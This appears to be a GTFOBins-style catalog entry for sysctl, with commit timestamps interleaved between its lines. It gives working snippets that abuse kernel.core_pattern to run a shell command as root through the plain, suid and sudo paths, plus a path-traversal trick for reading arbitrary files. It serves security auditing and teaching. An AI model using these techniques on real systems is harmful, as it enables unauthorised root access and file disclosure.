2020-06-11 18:10:35 +02:00
---
functions:
2022-12-16 17:12:13 +01:00
command:
- description: The command is executed by root in the background when a core dump occurs.
code: |
COMMAND='/bin/sh -c id>/tmp/id'
sysctl "kernel.core_pattern=|$COMMAND"
sleep 9999 &
kill -QUIT $!
cat /tmp/id
2020-06-11 18:10:35 +02:00
file-read:
2022-12-16 17:12:13 +01:00
- description: The `-p` argument can also be used in place of `-n` . In both cases though the output might get corrupted, so this might not be suitable to read binary files.
code: |
2020-06-11 18:10:35 +02:00
LFILE=file_to_read
2020-06-11 18:18:36 +02:00
/usr/sbin/sysctl -n "/../../$LFILE"
2020-06-11 18:10:35 +02:00
suid:
- code: |
2022-12-16 17:12:13 +01:00
COMMAND='/bin/sh -c id>/tmp/id'
./sysctl "kernel.core_pattern=|$COMMAND"
sleep 9999 &
kill -QUIT $!
cat /tmp/id
2020-06-11 18:10:35 +02:00
sudo:
- code: |
2022-12-16 17:12:13 +01:00
COMMAND='/bin/sh -c id>/tmp/id'
sudo sysctl "kernel.core_pattern=|$COMMAND"
sleep 9999 &
kill -QUIT $!
cat /tmp/id
2020-06-11 18:10:35 +02:00
---